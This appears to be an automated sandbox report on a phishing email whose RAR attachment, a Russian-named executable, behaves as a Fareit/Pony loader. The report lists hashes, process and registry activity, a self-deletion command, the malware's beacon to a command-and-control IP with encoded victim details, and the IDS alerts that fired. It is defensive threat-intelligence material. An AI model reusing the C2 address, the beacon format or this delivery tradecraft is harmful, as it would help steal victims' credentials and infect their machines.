| File name: | sce-593C16DD162D5061C4BA726234C5C818.eml |
| Full analysis: | https://app.any.run/tasks/d5c81270-0126-41ad-9dab-03682b0e4424 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | August 13, 2019, 12:59:09 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | message/rfc822 |
| File info: | RFC 822 mail, ASCII text, with CRLF line terminators |
| MD5: | 744CBC135DFE40C169AEA91F78EE062B |
| SHA1: | D1DE11067C6F95DCF3D16FA770EB312B14B39892 |
| SHA256: | 00C381ED39A284307AD87C53B575F18B2A5502DE2CA7A49266B25C6182E7EE4C |
| SSDEEP: | 1536:GsoyqooBWtMT8vajF5UMFnmwI0sk64HqXSMY31bwCcD8XKXGlM:GsfqoWTN5UarBsk1qXHa1bwhgpM |
| .eml | | | E-Mail message (Var. 5) (100) |
|---|
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 936 | cmd.exe /c del /F /Q "C:\Users\admin\AppData\Local\Temp\Rar$EXa2224.19042\Возвращение товара конец июля.exe" | C:\Windows\system32\cmd.exe | — | Возвращение товара конец июля.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1912 | "C:\PROGRA~1\MICROS~1\Office14\OUTLOOK.EXE" /eml "C:\Users\admin\AppData\Local\Temp\sce-593C16DD162D5061C4BA726234C5C818.eml" | C:\PROGRA~1\MICROS~1\Office14\OUTLOOK.EXE | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Exit code: 0 Version: 14.0.6025.1000 Modules
| |||||||||||||||
| 2224 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\Z1DB03P1\Возвращение товара конец июля.001" | C:\Program Files\WinRAR\WinRAR.exe | OUTLOOK.EXE | ||||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 Modules
| |||||||||||||||
| 2256 | "C:\Users\admin\AppData\Local\Temp\Rar$EXa2224.19042\Возвращение товара конец июля.exe" dfsr | C:\Users\admin\AppData\Local\Temp\Rar$EXa2224.19042\Возвращение товара конец июля.exe | Возвращение товара конец июля.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 3221225477 Modules
| |||||||||||||||
| 3600 | "C:\Users\admin\AppData\Local\Temp\Rar$EXa2224.19042\Возвращение товара конец июля.exe" | C:\Users\admin\AppData\Local\Temp\Rar$EXa2224.19042\Возвращение товара конец июля.exe | WinRAR.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 3221225477 Modules
| |||||||||||||||
| (PID) Process: | (1912) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (1912) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (1912) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems |
| Operation: | write | Name: | )%? |
Value: 29253F0078070000010000000000000000000000 | |||
| (PID) Process: | (1912) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook |
| Operation: | write | Name: | MTTT |
Value: 78070000F81F8EF0D651D50100000000 | |||
| (PID) Process: | (1912) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\SQM |
| Operation: | write | Name: | SQMSessionNumber |
Value: 0 | |||
| (PID) Process: | (1912) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\SQM |
| Operation: | write | Name: | SQMSessionDate |
Value: 220168800 | |||
| (PID) Process: | (1912) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\0a0d020000000000c000000000000046 |
| Operation: | write | Name: | 00030429 |
Value: 03000000 | |||
| (PID) Process: | (1912) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\9375CFF0413111d3B88A00104B2A6676 |
| Operation: | write | Name: | {ED475418-B0D6-11D2-8C3B-00104B2A6676} |
Value: | |||
| (PID) Process: | (1912) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\9375CFF0413111d3B88A00104B2A6676 |
| Operation: | write | Name: | LastChangeVer |
Value: 1200000000000000 | |||
| (PID) Process: | (1912) OUTLOOK.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109A10090400000000000F01FEC\Usage |
| Operation: | write | Name: | OutlookMAPI2Intl_1033 |
Value: 1326252053 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1912 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVRED09.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 1912 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\Z1DB03P1\Возвращение товара конец июля (2).001\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
| 1912 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | |
MD5:— | SHA256:— | |||
| 2224 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXa2224.19042\Возвращение товара конец июля.exe | executable | |
MD5:— | SHA256:— | |||
| 1912 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\Z1DB03P1\Возвращение товара конец июля.001 | compressed | |
MD5:— | SHA256:— | |||
| 1912 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\mapisvc.inf | text | |
MD5:48DD6CAE43CE26B992C35799FCD76898 | SHA256:7BFE1F3691E2B4FB4D61FBF5E9F7782FBE49DA1342DBD32201C2CC8E540DBD1A | |||
| 1912 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_RssRule_2_9EBAC973D3C6C94CB96A8471A586CC92.dat | xml | |
MD5:D8B37ED0410FB241C283F72B76987F18 | SHA256:31E68049F6B7F21511E70CD7F2D95B9CF1354CF54603E8F47C1FC40F40B7A114 | |||
| 1912 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_WorkHours_1_84ECA9333A2C19458D10255C0C2F3AA8.dat | xml | |
MD5:807EF0FC900FEB3DA82927990083D6E7 | SHA256:4411E7DC978011222764943081500FFF0E43CBF7CCD44264BD1AB6306CA68913 | |||
| 1912 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_Calendar_2_D93DC485786B59489D1C18E485E8DF5D.dat | xml | |
MD5:B21ED3BD946332FF6EBC41A87776C6BB | SHA256:B1AAC4E817CD10670B785EF8E5523C4A883F44138E50486987DC73054A46F6F4 | |||
| 1912 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_ContactPrefs_2_174E103394869C458365B8106BDBB346.dat | xml | |
MD5:BBCF400BD7AE536EB03054021D6A6398 | SHA256:383020065C1F31F4FB09F448599A6D5E532C390AF4E5B8AF0771FE17A23222AD | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1912 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
2256 | Возвращение товара конец июля.exe | GET | 200 | 185.203.119.211:80 | http://185.203.119.211/index.php?id=0&un=61646d696e&cn=555345522d5043&p=433a5c55736572735c61646d696e5c417070446174615c4c6f63616c5c54656d705c52617224455861323232342e31393034325c3f3f3f3f3f3f3f3f3f3f3f203f3f3f3f3f3f203f3f3f3f3f203f3f3f3f2e657865 | BG | executable | 97.0 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2256 | Возвращение товара конец июля.exe | 185.203.119.211:80 | — | BelCloud Hosting Corporation | BG | malicious |
2256 | Возвращение товара конец июля.exe | 104.25.47.99:443 | chain.so | Cloudflare Inc | US | shared |
1912 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
config.messenger.msn.com |
| whitelisted |
chain.so |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
2256 | Возвращение товара конец июля.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2256 | Возвращение товара конец июля.exe | A Network Trojan was detected | ET CURRENT_EVENTS WinHttpRequest Downloading EXE |
2256 | Возвращение товара конец июля.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
2256 | Возвращение товара конец июля.exe | A Network Trojan was detected | ET TROJAN Pony DLL Download M2 |
2256 | Возвращение товара конец июля.exe | A Network Trojan was detected | ET TROJAN Fareit/Pony Downloader Checkin 2 |
2256 | Возвращение товара конец июля.exe | A Network Trojan was detected | MALWARE [PTsecurity] Pony encrypted POST Data Request |
2256 | Возвращение товара конец июля.exe | A Network Trojan was detected | MALWARE [PTsecurity] Pony encrypted C2 Response |
2256 | Возвращение товара конец июля.exe | A Network Trojan was detected | MALWARE [PTsecurity] Fareit/Pony CnC Server stdResponse |